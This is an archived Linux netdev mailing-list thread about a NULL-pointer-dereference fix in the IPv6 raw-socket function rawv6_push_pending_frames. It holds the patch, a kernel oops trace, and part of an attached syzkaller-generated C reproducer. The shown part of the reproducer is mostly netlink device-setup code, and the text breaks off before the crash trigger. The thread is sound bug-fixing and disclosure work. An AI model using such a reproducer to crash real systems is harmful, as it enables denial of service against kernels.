netdev.vger.kernel.org archive mirror
 help / color / mirror / Atom feed
* net: ipv6: raw: fixes null pointer deference in rawv6_push_pending_frames
@ 2023-01-06 21:19 Kyle Zeng
  2023-01-06 22:55 ` Jakub Kicinski
  0 siblings, 1 reply; 10+ messages in thread
From: Kyle Zeng @ 2023-01-06 21:19 UTC (permalink / raw)
  To: davem; +Cc: yoshfuji, dsahern, edumazet, kuba, pabeni, netdev

The local variable csum_skb is initialized to NULL. It is posible that the skb_queue_walkloop
does not assign csum_skb to a real skb. After the loop, skb will be set to csum_skb, which
means skb is set to NULL. Then when the skb is used later, null pointer deference bug happens.
This patch catches the case and avoids the oops.

Signed-off-by: Kyle Zeng <zengyhkyle@gmail.com>
---
 net/ipv6/raw.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
index a06a9f847..982a8b77a 100644
--- a/net/ipv6/raw.c
+++ b/net/ipv6/raw.c
@@ -556,6 +556,9 @@ static int rawv6_push_pending_frames(struct sock *sk, struct flowi6 *fl6,
 		skb = csum_skb;
 	}
 
+	if (skb == NULL)
+		goto out;
+
 	offset += skb_transport_offset(skb);
 	err = skb_copy_bits(skb, offset, &csum, 2);
 	if (err < 0) {
-- 
2.34.1


^ permalink raw reply related	[flat|nested] 10+ messages in thread

* Re: net: ipv6: raw: fixes null pointer deference in rawv6_push_pending_frames
  2023-01-06 21:19 net: ipv6: raw: fixes null pointer deference in rawv6_push_pending_frames Kyle Zeng
@ 2023-01-06 22:55 ` Jakub Kicinski
  2023-01-06 23:12   ` Kyle Zeng
  0 siblings, 1 reply; 10+ messages in thread
From: Jakub Kicinski @ 2023-01-06 22:55 UTC (permalink / raw)
  To: Kyle Zeng; +Cc: davem, yoshfuji, dsahern, edumazet, pabeni, netdev

On Fri, 6 Jan 2023 14:19:52 -0700 Kyle Zeng wrote:
> It is posible that the skb_queue_walkloop does not assign csum_skb to a real skb.

Not immediately obvious to me how that could happen given prior checks
in this function.

^ permalink raw reply	[flat|nested] 10+ messages in thread

* Re: net: ipv6: raw: fixes null pointer deference in rawv6_push_pending_frames
  2023-01-06 22:55 ` Jakub Kicinski
@ 2023-01-06 23:12   ` Kyle Zeng
  2023-01-06 23:57     ` Jakub Kicinski
  2023-01-09  8:45     ` Eric Dumazet
  0 siblings, 2 replies; 10+ messages in thread
From: Kyle Zeng @ 2023-01-06 23:12 UTC (permalink / raw)
  To: Jakub Kicinski; +Cc: davem, yoshfuji, dsahern, edumazet, pabeni, netdev

Hi Jakub,

The null dereference can happen if every execution in the loop enters
the `if (offset >= len) {`branch  and directly `continue` without
running `csum_skb = skb`.
A crash report is attached to this email.

Best,
Kyle Zeng

=============================================
[    7.203616] BUG: kernel NULL pointer dereference, address: 00000000000000b2
[    7.205204] #PF: supervisor read access in kernel mode
[    7.206448] #PF: error_code(0x0000) - not-present page
[    7.207630] PGD 88d0067 P4D 88d0067 PUD 79af067 PMD 0
[    7.208060] Oops: 0000 [#1] SMP NOPTI
[    7.208343] CPU: 1 PID: 1846 Comm: poc Not tainted 5.10.133 #39
[    7.208816] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS 1.15.0-1 04/01/2014
[    7.209489] RIP: 0010:rawv6_push_pending_frames+0x96/0x1e0
[    7.209934] Code: 00 00 8d 57 ff 39 d0 0f 8d bc 00 00 00 48 89 7c
24 08 41 83 bc 24 d0 01 00 00 01 0f 85 b8 00 00 00 8b a9 88 00 00 00
48 89 cb <44> 0f b7 ab b2 00 00 00 44 03 ab c0 00 00 00 44 2b ab c8 00
00 00
[    7.211433] RSP: 0018:ffffc90003487b10 EFLAGS: 00010246
[    7.211859] RAX: 00000000000000d8 RBX: 0000000000000000 RCX: ffff8880064101c0
[    7.212410] RDX: 00000000000003c0 RSI: ffff8880064101c0 RDI: 00000000090e5840
[    7.212992] RBP: 00000000479c45b8 R08: 0000000000000000 R09: ffff8880064101a4
[    7.213559] R10: ffff8880064103d0 R11: ffff888006524b00 R12: ffff888006410000
[    7.214106] R13: ffffc90003487c10 R14: ffffc90003487c10 R15: 0000000000000000
[    7.214653] FS:  00000000017e03c0(0000) GS:ffff88803ec80000(0000)
knlGS:0000000000000000
[    7.215272] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    7.215769] CR2: 00000000000000b2 CR3: 0000000009068006 CR4: 0000000000770ee0
[    7.216318] PKRU: 55555554
[    7.216532] Call Trace:
[    7.216744]  rawv6_sendmsg+0x72c/0x7d0
[    7.217041]  kernel_sendmsg+0x7a/0x90
[    7.217325]  sock_no_sendpage+0xc1/0xe0
[    7.217644]  kernel_sendpage+0xa3/0xe0
[    7.217945]  sock_sendpage+0x23/0x30
[    7.218224]  pipe_to_sendpage+0x76/0xa0
[    7.218529]  __splice_from_pipe+0xe5/0x200
[    7.218870]  ? generic_splice_sendpage+0xa0/0xa0
[    7.219263]  generic_splice_sendpage+0x72/0xa0
[    7.219650]  do_splice+0x4ad/0x780
[    7.219928]  __se_sys_splice+0x162/0x210
[    7.220231]  do_syscall_64+0x31/0x40
[    7.220518]  entry_SYSCALL_64_after_hwframe+0x61/0xc6
[    7.220944] RIP: 0033:0x47656d
[    7.221189] Code: c3 e8 47 28 00 00 0f 1f 80 00 00 00 00 f3 0f 1e
fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24
08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89
01 48
[    7.222645] RSP: 002b:00007ffd36d11668 EFLAGS: 00000216 ORIG_RAX:
0000000000000113
[    7.223266] RAX: ffffffffffffffda RBX: 000000002000102f RCX: 000000000047656d
[    7.223860] RDX: 0000000000000007 RSI: 0000000000000000 RDI: 0000000000000005
[    7.224414] RBP: 00007ffd36d116a0 R08: 000000000804ffe2 R09: 0000000000000000
[    7.224986] R10: 0000000000000000 R11: 0000000000000216 R12: 0000000000000001
[    7.225546] R13: 00007ffd36d118d8 R14: 00000000005026c0 R15: 0000000000000002
[    7.226112] Modules linked in:
[    7.226350] CR2: 00000000000000b2
[    7.226613] ---[ end trace 5d56aba11d09b665 ]---
[    7.226993] RIP: 0010:rawv6_push_pending_frames+0x96/0x1e0
[    7.227442] Code: 00 00 8d 57 ff 39 d0 0f 8d bc 00 00 00 48 89 7c
24 08 41 83 bc 24 d0 01 00 00 01 0f 85 b8 00 00 00 8b a9 88 00 00 00
48 89 cb <44> 0f b7 ab b2 00 00 00 44 03 ab c0 00 00 00 44 2b ab c8 00
00 00
[    7.228918] RSP: 0018:ffffc90003487b10 EFLAGS: 00010246
[    7.229322] RAX: 00000000000000d8 RBX: 0000000000000000 RCX: ffff8880064101c0
[    7.229880] RDX: 00000000000003c0 RSI: ffff8880064101c0 RDI: 00000000090e5840
[    7.230516] RBP: 00000000479c45b8 R08: 0000000000000000 R09: ffff8880064101a4
[    7.231112] R10: ffff8880064103d0 R11: ffff888006524b00 R12: ffff888006410000
[    7.231687] R13: ffffc90003487c10 R14: ffffc90003487c10 R15: 0000000000000000
[    7.232250] FS:  00000000017e03c0(0000) GS:ffff88803ec80000(0000)
knlGS:0000000000000000
[    7.232912] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    7.233376] CR2: 00000000000000b2 CR3: 0000000009068006 CR4: 0000000000770ee0
[    7.233958] PKRU: 55555554
[    7.234170] Kernel panic - not syncing: Fatal exception
[    7.234762] Kernel Offset: disabled
[    7.235062] Rebooting in 1000 seconds..

On Fri, Jan 6, 2023 at 3:55 PM Jakub Kicinski <kuba@kernel.org> wrote:
>
> On Fri, 6 Jan 2023 14:19:52 -0700 Kyle Zeng wrote:
> > It is posible that the skb_queue_walkloop does not assign csum_skb to a real skb.
>
> Not immediately obvious to me how that could happen given prior checks
> in this function.

^ permalink raw reply	[flat|nested] 10+ messages in thread

* Re: net: ipv6: raw: fixes null pointer deference in rawv6_push_pending_frames
  2023-01-06 23:12   ` Kyle Zeng
@ 2023-01-06 23:57     ` Jakub Kicinski
  2023-01-08 22:09       ` Kyle Zeng
  2023-01-09  8:45     ` Eric Dumazet
  1 sibling, 1 reply; 10+ messages in thread
From: Jakub Kicinski @ 2023-01-06 23:57 UTC (permalink / raw)
  To: Kyle Zeng; +Cc: davem, yoshfuji, dsahern, edumazet, pabeni, netdev

On Fri, 6 Jan 2023 16:12:25 -0700 Kyle Zeng wrote:
> Hi Jakub,
> 
> The null dereference can happen if every execution in the loop enters
> the `if (offset >= len) {`branch  and directly `continue` without
> running `csum_skb = skb`.
> A crash report is attached to this email.

I see, please include the stack trace in the commit message in the
future. Do you have a repro for this stack trace?

We check the offset against total (cork) length early in the function
so maybe the accounting goes wrong somewhere or there is some integer
overflow problem?

Reminder: please don't top post on the kernel mailing lists.

> =============================================
> [    7.203616] BUG: kernel NULL pointer dereference, address: 00000000000000b2
> [    7.205204] #PF: supervisor read access in kernel mode
> [    7.206448] #PF: error_code(0x0000) - not-present page
> [    7.207630] PGD 88d0067 P4D 88d0067 PUD 79af067 PMD 0
> [    7.208060] Oops: 0000 [#1] SMP NOPTI
> [    7.208343] CPU: 1 PID: 1846 Comm: poc Not tainted 5.10.133 #39

> [    7.208816] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
> BIOS 1.15.0-1 04/01/2014
> [    7.209489] RIP: 0010:rawv6_push_pending_frames+0x96/0x1e0
> [    7.209934] Code: 00 00 8d 57 ff 39 d0 0f 8d bc 00 00 00 48 89 7c
> 24 08 41 83 bc 24 d0 01 00 00 01 0f 85 b8 00 00 00 8b a9 88 00 00 00
> 48 89 cb <44> 0f b7 ab b2 00 00 00 44 03 ab c0 00 00 00 44 2b ab c8 00
> 00 00
> [    7.211433] RSP: 0018:ffffc90003487b10 EFLAGS: 00010246
> [    7.211859] RAX: 00000000000000d8 RBX: 0000000000000000 RCX: ffff8880064101c0
> [    7.212410] RDX: 00000000000003c0 RSI: ffff8880064101c0 RDI: 00000000090e5840
> [    7.212992] RBP: 00000000479c45b8 R08: 0000000000000000 R09: ffff8880064101a4
> [    7.213559] R10: ffff8880064103d0 R11: ffff888006524b00 R12: ffff888006410000
> [    7.214106] R13: ffffc90003487c10 R14: ffffc90003487c10 R15: 0000000000000000
> [    7.214653] FS:  00000000017e03c0(0000) GS:ffff88803ec80000(0000)
> knlGS:0000000000000000
> [    7.215272] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [    7.215769] CR2: 00000000000000b2 CR3: 0000000009068006 CR4: 0000000000770ee0
> [    7.216318] PKRU: 55555554
> [    7.216532] Call Trace:
> [    7.216744]  rawv6_sendmsg+0x72c/0x7d0
> [    7.217041]  kernel_sendmsg+0x7a/0x90
> [    7.217325]  sock_no_sendpage+0xc1/0xe0
> [    7.217644]  kernel_sendpage+0xa3/0xe0
> [    7.217945]  sock_sendpage+0x23/0x30
> [    7.218224]  pipe_to_sendpage+0x76/0xa0
> [    7.218529]  __splice_from_pipe+0xe5/0x200
> [    7.218870]  ? generic_splice_sendpage+0xa0/0xa0
> [    7.219263]  generic_splice_sendpage+0x72/0xa0
> [    7.219650]  do_splice+0x4ad/0x780
> [    7.219928]  __se_sys_splice+0x162/0x210
> [    7.220231]  do_syscall_64+0x31/0x40
> [    7.220518]  entry_SYSCALL_64_after_hwframe+0x61/0xc6
> [    7.220944] RIP: 0033:0x47656d
> [    7.221189] Code: c3 e8 47 28 00 00 0f 1f 80 00 00 00 00 f3 0f 1e
> fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24
> 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89
> 01 48
> [    7.222645] RSP: 002b:00007ffd36d11668 EFLAGS: 00000216 ORIG_RAX:
> 0000000000000113
> [    7.223266] RAX: ffffffffffffffda RBX: 000000002000102f RCX: 000000000047656d
> [    7.223860] RDX: 0000000000000007 RSI: 0000000000000000 RDI: 0000000000000005
> [    7.224414] RBP: 00007ffd36d116a0 R08: 000000000804ffe2 R09: 0000000000000000
> [    7.224986] R10: 0000000000000000 R11: 0000000000000216 R12: 0000000000000001
> [    7.225546] R13: 00007ffd36d118d8 R14: 00000000005026c0 R15: 0000000000000002
> [    7.226112] Modules linked in:
> [    7.226350] CR2: 00000000000000b2


^ permalink raw reply	[flat|nested] 10+ messages in thread

* Re: net: ipv6: raw: fixes null pointer deference in rawv6_push_pending_frames
  2023-01-06 23:57     ` Jakub Kicinski
@ 2023-01-08 22:09       ` Kyle Zeng
  0 siblings, 0 replies; 10+ messages in thread
From: Kyle Zeng @ 2023-01-08 22:09 UTC (permalink / raw)
  To: Jakub Kicinski; +Cc: davem, yoshfuji, dsahern, edumazet, pabeni, netdev

> Reminder: please don't top post on the kernel mailing lists.
Sorry about that, I will try to avoid doing that in the future.

> I see, please include the stack trace in the commit message in the
> future. Do you have a repro for this stack trace?
Yes I have a reproducer for this bug. However, it is automatically
generated by a fuzzer. It is not quite readable. Due to my limited
understanding of the network stack, I failed to minimize it and
found the actual root cause of the accounting issue. The raw crash
PoC is attached to this email.
The program needs to be run as root or in a network namespace to
trigger the bug.

=============================================
// autogenerated by syzkaller (https://github.com/google/syzkaller)

#define _GNU_SOURCE

#include <arpa/inet.h>
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <sched.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#include <linux/capability.h>
#include <linux/genetlink.h>
#include <linux/if_addr.h>
#include <linux/if_ether.h>
#include <linux/if_link.h>
#include <linux/if_tun.h>
#include <linux/in6.h>
#include <linux/ip.h>
#include <linux/neighbour.h>
#include <linux/net.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/tcp.h>
#include <linux/veth.h>

static unsigned long long procid;

static void sleep_ms(uint64_t ms)
{
	usleep(ms * 1000);
}

static uint64_t current_time_ms(void)
{
	struct timespec ts;
	if (clock_gettime(CLOCK_MONOTONIC, &ts))
	exit(1);
	return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}

static bool write_file(const char* file, const char* what, ...)
{
	char buf[1024];
	va_list args;
	va_start(args, what);
	vsnprintf(buf, sizeof(buf), what, args);
	va_end(args);
	buf[sizeof(buf) - 1] = 0;
	int len = strlen(buf);
	int fd = open(file, O_WRONLY | O_CLOEXEC);
	if (fd == -1)
		return false;
	if (write(fd, buf, len) != len) {
		int err = errno;
		close(fd);
		errno = err;
		return false;
	}
	close(fd);
	return true;
}

struct nlmsg {
	char* pos;
	int nesting;
	struct nlattr* nested[8];
	char buf[4096];
};

static void netlink_init(struct nlmsg* nlmsg, int typ, int flags,
			 const void* data, int size)
{
	memset(nlmsg, 0, sizeof(*nlmsg));
	struct nlmsghdr* hdr = (struct nlmsghdr*)nlmsg->buf;
	hdr->nlmsg_type = typ;
	hdr->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | flags;
	memcpy(hdr + 1, data, size);
	nlmsg->pos = (char*)(hdr + 1) + NLMSG_ALIGN(size);
}

static void netlink_attr(struct nlmsg* nlmsg, int typ,
			 const void* data, int size)
{
	struct nlattr* attr = (struct nlattr*)nlmsg->pos;
	attr->nla_len = sizeof(*attr) + size;
	attr->nla_type = typ;
	if (size > 0)
		memcpy(attr + 1, data, size);
	nlmsg->pos += NLMSG_ALIGN(attr->nla_len);
}

static void netlink_nest(struct nlmsg* nlmsg, int typ)
{
	struct nlattr* attr = (struct nlattr*)nlmsg->pos;
	attr->nla_type = typ;
	nlmsg->pos += sizeof(*attr);
	nlmsg->nested[nlmsg->nesting++] = attr;
}

static void netlink_done(struct nlmsg* nlmsg)
{
	struct nlattr* attr = nlmsg->nested[--nlmsg->nesting];
	attr->nla_len = nlmsg->pos - (char*)attr;
}

static int netlink_send_ext(struct nlmsg* nlmsg, int sock,
			    uint16_t reply_type, int* reply_len, bool dofail)
{
	if (nlmsg->pos > nlmsg->buf + sizeof(nlmsg->buf) || nlmsg->nesting)
	exit(1);
	struct nlmsghdr* hdr = (struct nlmsghdr*)nlmsg->buf;
	hdr->nlmsg_len = nlmsg->pos - nlmsg->buf;
	struct sockaddr_nl addr;
	memset(&addr, 0, sizeof(addr));
	addr.nl_family = AF_NETLINK;
	ssize_t n = sendto(sock, nlmsg->buf, hdr->nlmsg_len, 0, (struct sockaddr*)&addr, sizeof(addr));
	if (n != (ssize_t)hdr->nlmsg_len) {
		if (dofail)
	exit(1);
		return -1;
	}
	n = recv(sock, nlmsg->buf, sizeof(nlmsg->buf), 0);
	if (reply_len)
		*reply_len = 0;
	if (n < 0) {
		if (dofail)
	exit(1);
		return -1;
	}
	if (n < (ssize_t)sizeof(struct nlmsghdr)) {
		errno = EINVAL;
		if (dofail)
	exit(1);
		return -1;
	}
	if (hdr->nlmsg_type == NLMSG_DONE)
		return 0;
	if (reply_len && hdr->nlmsg_type == reply_type) {
		*reply_len = n;
		return 0;
	}
	if (n < (ssize_t)(sizeof(struct nlmsghdr) + sizeof(struct nlmsgerr))) {
		errno = EINVAL;
		if (dofail)
	exit(1);
		return -1;
	}
	if (hdr->nlmsg_type != NLMSG_ERROR) {
		errno = EINVAL;
		if (dofail)
	exit(1);
		return -1;
	}
	errno = -((struct nlmsgerr*)(hdr + 1))->error;
	return -errno;
}

static int netlink_send(struct nlmsg* nlmsg, int sock)
{
	return netlink_send_ext(nlmsg, sock, 0, NULL, true);
}

static int netlink_query_family_id(struct nlmsg* nlmsg, int sock, const char* family_name, bool dofail)
{
	struct genlmsghdr genlhdr;
	memset(&genlhdr, 0, sizeof(genlhdr));
	genlhdr.cmd = CTRL_CMD_GETFAMILY;
	netlink_init(nlmsg, GENL_ID_CTRL, 0, &genlhdr, sizeof(genlhdr));
	netlink_attr(nlmsg, CTRL_ATTR_FAMILY_NAME, family_name, strnlen(family_name, GENL_NAMSIZ - 1) + 1);
	int n = 0;
	int err = netlink_send_ext(nlmsg, sock, GENL_ID_CTRL, &n, dofail);
	if (err < 0) {
		return -1;
	}
	uint16_t id = 0;
	struct nlattr* attr = (struct nlattr*)(nlmsg->buf + NLMSG_HDRLEN + NLMSG_ALIGN(sizeof(genlhdr)));
	for (; (char*)attr < nlmsg->buf + n; attr = (struct nlattr*)((char*)attr + NLMSG_ALIGN(attr->nla_len))) {
		if (attr->nla_type == CTRL_ATTR_FAMILY_ID) {
			id = *(uint16_t*)(attr + 1);
			break;
		}
	}
	if (!id) {
		errno = EINVAL;
		return -1;
	}
	recv(sock, nlmsg->buf, sizeof(nlmsg->buf), 0);
	return id;
}

static int netlink_next_msg(struct nlmsg* nlmsg, unsigned int offset,
			    unsigned int total_len)
{
	struct nlmsghdr* hdr = (struct nlmsghdr*)(nlmsg->buf + offset);
	if (offset == total_len || offset + hdr->nlmsg_len > total_len)
		return -1;
	return hdr->nlmsg_len;
}

static void netlink_add_device_impl(struct nlmsg* nlmsg, const char* type,
				    const char* name)
{
	struct ifinfomsg hdr;
	memset(&hdr, 0, sizeof(hdr));
	netlink_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &hdr, sizeof(hdr));
	if (name)
		netlink_attr(nlmsg, IFLA_IFNAME, name, strlen(name));
	netlink_nest(nlmsg, IFLA_LINKINFO);
	netlink_attr(nlmsg, IFLA_INFO_KIND, type, strlen(type));
}

static void netlink_add_device(struct nlmsg* nlmsg, int sock, const char* type,
			       const char* name)
{
	netlink_add_device_impl(nlmsg, type, name);
	netlink_done(nlmsg);
	int err = netlink_send(nlmsg, sock);
	if (err < 0) {
	}
}

static void netlink_add_veth(struct nlmsg* nlmsg, int sock, const char* name,
			     const char* peer)
{
	netlink_add_device_impl(nlmsg, "veth", name);
	netlink_nest(nlmsg, IFLA_INFO_DATA);
	netlink_nest(nlmsg, VETH_INFO_PEER);
	nlmsg->pos += sizeof(struct ifinfomsg);
	netlink_attr(nlmsg, IFLA_IFNAME, peer, strlen(peer));
	netlink_done(nlmsg);
	netlink_done(nlmsg);
	netlink_done(nlmsg);
	int err = netlink_send(nlmsg, sock);
	if (err < 0) {
	}
}

static void netlink_add_hsr(struct nlmsg* nlmsg, int sock, const char* name,
			    const char* slave1, const char* slave2)
{
	netlink_add_device_impl(nlmsg, "hsr", name);
	netlink_nest(nlmsg, IFLA_INFO_DATA);
	int ifindex1 = if_nametoindex(slave1);
	netlink_attr(nlmsg, IFLA_HSR_SLAVE1, &ifindex1, sizeof(ifindex1));
	int ifindex2 = if_nametoindex(slave2);
	netlink_attr(nlmsg, IFLA_HSR_SLAVE2, &ifindex2, sizeof(ifindex2));
	netlink_done(nlmsg);
	netlink_done(nlmsg);
	int err = netlink_send(nlmsg, sock);
	if (err < 0) {
	}
}

static void netlink_add_linked(struct nlmsg* nlmsg, int sock, const char* type, const char* name, const char* link)
{
	netlink_add_device_impl(nlmsg, type, name);
	netlink_done(nlmsg);
	int ifindex = if_nametoindex(link);
	netlink_attr(nlmsg, IFLA_LINK, &ifindex, sizeof(ifindex));
	int err = netlink_send(nlmsg, sock);
	if (err < 0) {
	}
}

static void netlink_add_vlan(struct nlmsg* nlmsg, int sock, const char* name, const char* link, uint16_t id, uint16_t proto)
{
	netlink_add_device_impl(nlmsg, "vlan", name);
	netlink_nest(nlmsg, IFLA_INFO_DATA);
	netlink_attr(nlmsg, IFLA_VLAN_ID, &id, sizeof(id));
	netlink_attr(nlmsg, IFLA_VLAN_PROTOCOL, &proto, sizeof(proto));
	netlink_done(nlmsg);
	netlink_done(nlmsg);
	int ifindex = if_nametoindex(link);
	netlink_attr(nlmsg, IFLA_LINK, &ifindex, sizeof(ifindex));
	int err = netlink_send(nlmsg, sock);
	if (err < 0) {
	}
}

static void netlink_add_macvlan(struct nlmsg* nlmsg, int sock, const char* name, const char* link)
{
	netlink_add_device_impl(nlmsg, "macvlan", name);
	netlink_nest(nlmsg, IFLA_INFO_DATA);
	uint32_t mode = MACVLAN_MODE_BRIDGE;
	netlink_attr(nlmsg, IFLA_MACVLAN_MODE, &mode, sizeof(mode));
	netlink_done(nlmsg);
	netlink_done(nlmsg);
	int ifindex = if_nametoindex(link);
	netlink_attr(nlmsg, IFLA_LINK, &ifindex, sizeof(ifindex));
	int err = netlink_send(nlmsg, sock);
	if (err < 0) {
	}
}

static void netlink_add_geneve(struct nlmsg* nlmsg, int sock, const char* name, uint32_t vni, struct in_addr* addr4, struct in6_addr* addr6)
{
	netlink_add_device_impl(nlmsg, "geneve", name);
	netlink_nest(nlmsg, IFLA_INFO_DATA);
	netlink_attr(nlmsg, IFLA_GENEVE_ID, &vni, sizeof(vni));
	if (addr4)
		netlink_attr(nlmsg, IFLA_GENEVE_REMOTE, addr4, sizeof(*addr4));
	if (addr6)
		netlink_attr(nlmsg, IFLA_GENEVE_REMOTE6, addr6, sizeof(*addr6));
	netlink_done(nlmsg);
	netlink_done(nlmsg);
	int err = netlink_send(nlmsg, sock);
	if (err < 0) {
	}
}

#define IFLA_IPVLAN_FLAGS 2
#define IPVLAN_MODE_L3S 2
#undef IPVLAN_F_VEPA
#define IPVLAN_F_VEPA 2

static void netlink_add_ipvlan(struct nlmsg* nlmsg, int sock, const char* name, const char* link, uint16_t mode, uint16_t flags)
{
	netlink_add_device_impl(nlmsg, "ipvlan", name);
	netlink_nest(nlmsg, IFLA_INFO_DATA);
	netlink_attr(nlmsg, IFLA_IPVLAN_MODE, &mode, sizeof(mode));
	netlink_attr(nlmsg, IFLA_IPVLAN_FLAGS, &flags, sizeof(flags));
	netlink_done(nlmsg);
	netlink_done(nlmsg);
	int ifindex = if_nametoindex(link);
	netlink_attr(nlmsg, IFLA_LINK, &ifindex, sizeof(ifindex));
	int err = netlink_send(nlmsg, sock);
	if (err < 0) {
	}
}

static void netlink_device_change(struct nlmsg* nlmsg, int sock, const char* name, bool up,
				  const char* master, const void* mac, int macsize,
				  const char* new_name)
{
	struct ifinfomsg hdr;
	memset(&hdr, 0, sizeof(hdr));
	if (up)
		hdr.ifi_flags = hdr.ifi_change = IFF_UP;
	hdr.ifi_index = if_nametoindex(name);
	netlink_init(nlmsg, RTM_NEWLINK, 0, &hdr, sizeof(hdr));
	if (new_name)
		netlink_attr(nlmsg, IFLA_IFNAME, new_name, strlen(new_name));
	if (master) {
		int ifindex = if_nametoindex(master);
		netlink_attr(nlmsg, IFLA_MASTER, &ifindex, sizeof(ifindex));
	}
	if (macsize)
		netlink_attr(nlmsg, IFLA_ADDRESS, mac, macsize);
	int err = netlink_send(nlmsg, sock);
	if (err < 0) {
	}
}

static int netlink_add_addr(struct nlmsg* nlmsg, int sock, const char* dev,
			    const void* addr, int addrsize)
{
	struct ifaddrmsg hdr;
	memset(&hdr, 0, sizeof(hdr));
	hdr.ifa_family = addrsize == 4 ? AF_INET : AF_INET6;
	hdr.ifa_prefixlen = addrsize == 4 ? 24 : 120;
	hdr.ifa_scope = RT_SCOPE_UNIVERSE;
	hdr.ifa_index = if_nametoindex(dev);
	netlink_init(nlmsg, RTM_NEWADDR, NLM_F_CREATE | NLM_F_REPLACE, &hdr, sizeof(hdr));
	netlink_attr(nlmsg, IFA_LOCAL, addr, addrsize);
	netlink_attr(nlmsg, IFA_ADDRESS, addr, addrsize);
	return netlink_send(nlmsg, sock);
}

static void netlink_add_addr4(struct nlmsg* nlmsg, int sock,
			      const char* dev, const char* addr)
{
	struct in_addr in_addr;
	inet_pton(AF_INET, addr, &in_addr);
	int err = netlink_add_addr(nlmsg, sock, dev, &in_addr, sizeof(in_addr));
	if (err < 0) {
	}
}

static void netlink_add_addr6(struct nlmsg* nlmsg, int sock,
			      const char* dev, const char* addr)
{
	struct in6_addr in6_addr;
	inet_pton(AF_INET6, addr, &in6_addr);
	int err = netlink_add_addr(nlmsg, sock, dev, &in6_addr, sizeof(in6_addr));
	if (err < 0) {
	}
}

static struct nlmsg nlmsg;

#define DEVLINK_FAMILY_NAME "devlink"

#define DEVLINK_CMD_PORT_GET 5
#define DEVLINK_ATTR_BUS_NAME 1
#define DEVLINK_ATTR_DEV_NAME 2
#define DEVLINK_ATTR_NETDEV_NAME 7

static struct nlmsg nlmsg2;

static void initialize_devlink_ports(const char* bus_name, const char* dev_name,
				     const char* netdev_prefix)
{
	struct genlmsghdr genlhdr;
	int len, total_len, id, err, offset;
	uint16_t netdev_index;
	int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC);
	if (sock == -1)
	exit(1);
	int rtsock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
	if (rtsock == -1)
	exit(1);
	id = netlink_query_family_id(&nlmsg, sock, DEVLINK_FAMILY_NAME, true);
	if (id == -1)
		goto error;
	memset(&genlhdr, 0, sizeof(genlhdr));
	genlhdr.cmd = DEVLINK_CMD_PORT_GET;
	netlink_init(&nlmsg, id, NLM_F_DUMP, &genlhdr, sizeof(genlhdr));
	netlink_attr(&nlmsg, DEVLINK_ATTR_BUS_NAME, bus_name, strlen(bus_name) + 1);
	netlink_attr(&nlmsg, DEVLINK_ATTR_DEV_NAME, dev_name, strlen(dev_name) + 1);
	err = netlink_send_ext(&nlmsg, sock, id, &total_len, true);
	if (err < 0) {
		goto error;
	}
	offset = 0;
	netdev_index = 0;
	while ((len = netlink_next_msg(&nlmsg, offset, total_len)) != -1) {
		struct nlattr* attr = (struct nlattr*)(nlmsg.buf + offset + NLMSG_HDRLEN + NLMSG_ALIGN(sizeof(genlhdr)));
		for (; (char*)attr < nlmsg.buf + offset + len; attr = (struct nlattr*)((char*)attr + NLMSG_ALIGN(attr->nla_len))) {
			if (attr->nla_type == DEVLINK_ATTR_NETDEV_NAME) {
				char* port_name;
				char netdev_name[IFNAMSIZ];
				port_name = (char*)(attr + 1);
				snprintf(netdev_name, sizeof(netdev_name), "%s%d", netdev_prefix, netdev_index);
				netlink_device_change(&nlmsg2, rtsock, port_name, true, 0, 0, 0, netdev_name);
				break;
			}
		}
		offset += len;
		netdev_index++;
	}
error:
	close(rtsock);
	close(sock);
}

#define DEV_IPV4 "172.20.20.%d"
#define DEV_IPV6 "fe80::%02x"
#define DEV_MAC 0x00aaaaaaaaaa

static void netdevsim_add(unsigned int addr, unsigned int port_count)
{
	char buf[16];
	sprintf(buf, "%u %u", addr, port_count);
	if (write_file("/sys/bus/netdevsim/new_device", buf)) {
		snprintf(buf, sizeof(buf), "netdevsim%d", addr);
		initialize_devlink_ports("netdevsim", buf, "netdevsim");
	}
}

#define WG_GENL_NAME "wireguard"
enum wg_cmd {
	WG_CMD_GET_DEVICE,
	WG_CMD_SET_DEVICE,
};
enum wgdevice_attribute {
	WGDEVICE_A_UNSPEC,
	WGDEVICE_A_IFINDEX,
	WGDEVICE_A_IFNAME,
	WGDEVICE_A_PRIVATE_KEY,
	WGDEVICE_A_PUBLIC_KEY,
	WGDEVICE_A_FLAGS,
	WGDEVICE_A_LISTEN_PORT,
	WGDEVICE_A_FWMARK,
	WGDEVICE_A_PEERS,
};
enum wgpeer_attribute {
	WGPEER_A_UNSPEC,
	WGPEER_A_PUBLIC_KEY,
	WGPEER_A_PRESHARED_KEY,
	WGPEER_A_FLAGS,
	WGPEER_A_ENDPOINT,
